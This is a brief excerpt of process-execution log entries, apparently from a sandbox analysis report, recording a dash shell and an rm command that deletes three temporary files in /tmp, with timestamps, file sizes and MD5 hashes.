Arguments:rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
File size:72056 bytes
MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/dash
Arguments:-
File size:129816 bytes
MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):04:02:54
Start date (UTC):09/04/2025
Path:/usr/bin/rm
Arguments:rm -f /tmp/tmp.VRkxPVJ6Sj /tmp/tmp.ncrIJiM7Dj /tmp/tmp.joQWAPCCbe
File size:72056 bytes
MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b